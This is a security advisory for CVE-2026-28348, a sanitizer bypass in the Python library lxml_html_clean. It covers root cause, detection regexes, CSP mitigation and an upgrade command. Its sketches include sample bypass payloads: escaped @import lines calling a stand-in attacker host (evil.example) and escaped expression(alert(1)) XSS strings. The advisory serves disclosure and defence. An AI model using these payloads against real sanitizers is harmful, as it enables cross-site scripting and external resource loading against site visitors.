CVE-2026-28348: lxml_html_clean XSS Vulnerability

CVE-2026-28348 Overview

CVE-2026-28348 is a Cross-Site Scripting (XSS) and CSS injection vulnerability in lxml_html_clean, a Python project that provides HTML cleaning functionalities copied from lxml.html.clean. Prior to version 0.4.4, the _has_sneaky_javascript() method strips backslashes before checking for dangerous CSS keywords. This behavior allows CSS Unicode escape sequences to bypass the @import and expression() filters, enabling external CSS loading or XSS attacks in older browsers.

Critical Impact
Attackers can bypass HTML sanitization filters using CSS Unicode escape sequences, potentially leading to cross-site scripting attacks or loading of external malicious CSS in applications that rely on lxml_html_clean for input sanitization.

Affected Products

lxml_html_clean versions prior to 0.4.4
Applications using lxml_html_clean for HTML sanitization
Python web applications relying on lxml.html.clean functionality

Discovery Timeline

2026-03-05 - CVE-2026-28348 published to NVD
2026-03-05 - Last updated in NVD database

Technical Details for CVE-2026-28348

Vulnerability Analysis

The vulnerability resides in the _has_sneaky_javascript() method within lxml_html_clean, which is responsible for detecting and filtering potentially dangerous JavaScript patterns in CSS. The method's implementation contains a flaw in how it processes CSS content before performing security checks.

When processing CSS input, the method strips backslash characters before evaluating the content against a list of dangerous keywords such as @import and expression(). This preprocessing step inadvertently enables attackers to craft CSS payloads using Unicode escape sequences that evade detection.

CSS supports Unicode escape sequences written as a backslash followed by one to six hexadecimal digits (for example \69 or \000069), optionally terminated by a single whitespace character. By encoding characters of dangerous keywords with these escapes, an attacker can construct payloads that appear benign to the filter but are interpreted as valid CSS by browsers.

For example, the @import directive could be obfuscated using Unicode escapes, allowing an attacker to load external stylesheets from attacker-controlled domains. Similarly, the expression() function, which is supported in older versions of Internet Explorer, could be encoded to execute arbitrary JavaScript within style attributes.
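To make the escape format concrete, the following is a minimal Python sketch of how a CSS tokenizer resolves hexadecimal escapes (a backslash, one to six hex digits, and one optional trailing whitespace character). The function name decode_css_escapes and the sample payloads are illustrative assumptions; this is not code from lxml_html_clean or from any browser, and it ignores non-hexadecimal escapes.

```python
import re

# One backslash, 1-6 hex digits, then one optional whitespace character
# that terminates the escape.
_CSS_HEX_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})(?:\r\n|[ \t\r\n\f])?")


def decode_css_escapes(css):
    """Approximate how a CSS tokenizer resolves hexadecimal escapes."""

    def _replace(match):
        code_point = int(match.group(1), 16)
        # Zero, surrogates, and out-of-range values become U+FFFD.
        if code_point == 0 or 0xD800 <= code_point <= 0xDFFF or code_point > 0x10FFFF:
            return "\ufffd"
        return chr(code_point)

    return _CSS_HEX_ESCAPE.sub(_replace, css)


# Hypothetical payloads, shown only to illustrate the decoding.
print(decode_css_escapes(r"@\69mport url(x.css)"))     # @import url(x.css)
print(decode_css_escapes(r"\65 xpression(alert(1))"))  # expression(alert(1))
```

The trailing space in the second payload matters: without it, a following character that happens to be a hex digit would be absorbed into the escape.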

Root Cause

The root cause is improper encoding or escaping of output (CWE-116) in the CSS security filtering logic. The _has_sneaky_javascript() method removes backslashes from CSS content before checking for dangerous patterns, whereas CSS parsers in browsers decode Unicode escape sequences. Stripping the backslash from an escape such as \69 leaves the literal text 69 rather than the letter i, so the keyword check sees a harmless string while the browser reconstructs the dangerous one. This disconnect between what the sanitizer sees and what the browser interprets enables a classic filter bypass.
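The mismatch can be modelled in a few lines. The sketch below is a simplified, hypothetical stand-in for the flawed check, written only from the behavior described in this advisory; it is not the actual _has_sneaky_javascript() implementation, and the function name and payloads are assumptions.

```python
def strips_backslashes_then_checks(style):
    """Hypothetical model of the flawed check; NOT the library's code."""
    # Step 1: remove every backslash, as the advisory describes.
    seen_by_filter = style.replace("\\", "").lower()
    # Step 2: look for dangerous keywords in the stripped text.
    return "@import" in seen_by_filter or "expression(" in seen_by_filter


plain = "@import url(//evil.example/x.css)"
literal_escape = r"@\import url(//evil.example/x.css)"
hex_escape = r"@\69mport url(//evil.example/x.css)"

print(strips_backslashes_then_checks(plain))           # True: caught
print(strips_backslashes_then_checks(literal_escape))  # True: "\i" strips to "i"
print(strips_backslashes_then_checks(hex_escape))      # False: filter sees "@69mport"
```

Stripping works for escapes of non-hexadecimal characters, where the escaped character is simply itself, which is presumably why the step existed. It fails for hexadecimal escapes because the digits that remain do not spell the keyword.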

Attack Vector

The attack requires user interaction: a victim must view content containing the malicious CSS payload. The payload can be delivered through any application input that is processed by lxml_html_clean, such as user-generated content, comment fields, or other HTML input that undergoes sanitization. When the sanitized content is rendered in a browser, the CSS Unicode escape sequences are decoded and the malicious directives take effect.

The vulnerability specifically targets:

External CSS loading via obfuscated @import statements, which can be used for data exfiltration or content injection
XSS execution via the expression() function in legacy Internet Explorer browsers

The attack is network-based, requiring no privileges on the target system, but does require user interaction to trigger. The scope is changed, meaning successful exploitation can impact resources beyond the vulnerable component.

Detection Methods for CVE-2026-28348

Indicators of Compromise

CSS content containing unusual Unicode escape sequences, particularly patterns like \0040import or \0065xpression
Web application logs showing style attributes or CSS blocks with multiple backslash-escaped characters
Requests to external stylesheets from unexpected or unknown domains referenced in user-generated content
Browser console errors related to blocked CSS resources when Content Security Policy is enforced
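As one way to hunt for the first two indicators, the sketch below builds a regular expression per keyword that still matches when any character is written as a CSS hexadecimal escape, then reports only matches that actually contain a backslash. The helper names, the keyword list, and the sample lines are assumptions for illustration; a real log format would need its own parsing.

```python
import re


def obfuscated_keyword_pattern(keyword):
    """Match `keyword` where any character may be a CSS hex escape."""
    parts = []
    for char in keyword:
        # Accept the escape for either letter case, with up to four
        # leading zeros and one optional trailing whitespace character.
        codes = {f"{ord(char.lower()):x}", f"{ord(char.upper()):x}"}
        escape = r"\\0{0,4}(?:" + "|".join(sorted(codes)) + r")\s?"
        parts.append(f"(?:{re.escape(char)}|{escape})")
    return re.compile("".join(parts), re.IGNORECASE)


KEYWORDS = {name: obfuscated_keyword_pattern(name) for name in ("@import", "expression")}


def find_indicators(lines):
    """Return (line number, keyword, matched text) for escaped keywords."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for name, pattern in KEYWORDS.items():
            for match in pattern.finditer(line):
                # Plain, unescaped keywords are not reported here.
                if "\\" in match.group(0):
                    hits.append((number, name, match.group(0)))
    return hits


sample = [
    r'<p style="background: url(x)">',
    r"<style>@\69mport url(//evil.example/a.css);</style>",
    r'<div style="width: \0065xpression(alert(1))">',
    "import os",
]
for hit in find_indicators(sample):
    print(hit)
```

Requiring a backslash in the match keeps ordinary occurrences of the words out of the results, at the cost of leaving unescaped keywords to the sanitizer's normal checks.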

Detection Strategies

Implement input validation rules to detect CSS content with Unicode escape sequences in style-related contexts
Monitor for anomalous CSS patterns in user-submitted content, particularly escape sequences near CSS function calls or directives
Deploy web application firewall (WAF) rules to flag CSS content containing obfuscated @import or expression() patterns
Review application dependencies to identify usage of lxml_html_clean versions prior to 0.4.4
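The dependency review in the last item can be partly automated. The following sketch uses the standard library's importlib.metadata to read the installed version and compares it with 0.4.4. The helper names are assumptions, and the version parsing is deliberately simplistic (it ignores pre-release suffixes); packaging.version.Version would be a more robust comparison where that package is available.

```python
import re
from importlib import metadata

PATCHED_RELEASE = (0, 4, 4)  # first fixed version named in this advisory


def parse_release(version):
    """Turn '0.4.3' into (0, 4, 3); missing parts count as zero."""
    match = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part or 0) for part in match.groups())


def is_vulnerable(version):
    """True when the release is older than the patched one."""
    return parse_release(version) < PATCHED_RELEASE


def check_installed(package="lxml_html_clean"):
    """Return True/False for an installed package, None if it is absent."""
    try:
        installed = metadata.version(package)
    except metadata.PackageNotFoundError:
        return None
    return is_vulnerable(installed)


print(check_installed())
```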

Monitoring Recommendations

Enable verbose logging for HTML sanitization operations to capture potentially malicious input attempts
Configure Content Security Policy (CSP) headers with style-src directives to restrict external stylesheet loading
Implement real-time monitoring for outbound connections to unknown domains that could indicate CSS-based data exfiltration
Set up dependency vulnerability scanning to alert on outdated lxml_html_clean versions in your software supply chain
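For the Content Security Policy recommendation, a small WSGI wrapper is one possible way to attach the header in a Python application. This is a sketch under assumptions: the function name add_csp and the policy value are illustrative, and a real policy has to be tuned to the stylesheets the application legitimately loads. With style-src limited to 'self' and no 'unsafe-inline', browsers that enforce CSP refuse inline styles and stylesheets from other origins.

```python
CSP_VALUE = "default-src 'self'; style-src 'self'"  # example policy only


def add_csp(app, policy=CSP_VALUE):
    """Wrap a WSGI app so every response carries the CSP header."""

    def wrapped(environ, start_response):
        def start_with_csp(status, headers, exc_info=None):
            # Drop any existing CSP header, then append ours.
            headers = [h for h in headers if h[0].lower() != "content-security-policy"]
            headers.append(("Content-Security-Policy", policy))
            return start_response(status, headers, exc_info)

        return app(environ, start_with_csp)

    return wrapped
```

Usage would be along the lines of application = add_csp(application) in the module that exposes the WSGI callable.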

How to Mitigate CVE-2026-28348

Immediate Actions Required

Upgrade lxml_html_clean to version 0.4.4 or later immediately
Review and audit all user-generated content that may have been processed by vulnerable versions
Implement Content Security Policy headers to restrict inline styles and external stylesheet sources as a defense-in-depth measure
Consider adding secondary validation for CSS content in security-critical applications

Patch Information

The vulnerability has been patched in lxml_html_clean version 0.4.4. The fix addresses the backslash stripping behavior in the _has_sneaky_javascript() method to properly handle CSS Unicode escape sequences before security filtering.

For detailed information about the fix, refer to the GitHub Security Advisory and the commit implementing the patch.

Workarounds

Implement additional CSS validation logic at the application layer that decodes Unicode escape sequences before filtering
Use Content Security Policy headers with strict style-src directives to block external CSS and inline styles where feasible
Disable or filter the expression() function and @import directive at the application level as an additional layer of defense
Consider using alternative HTML sanitization libraries that properly handle CSS Unicode escape sequences if upgrading is not immediately possible

bash

# Upgrade lxml_html_clean to patched version
pip install --upgrade "lxml_html_clean>=0.4.4"

# Verify installed version
pip show lxml_html_clean | grep Version
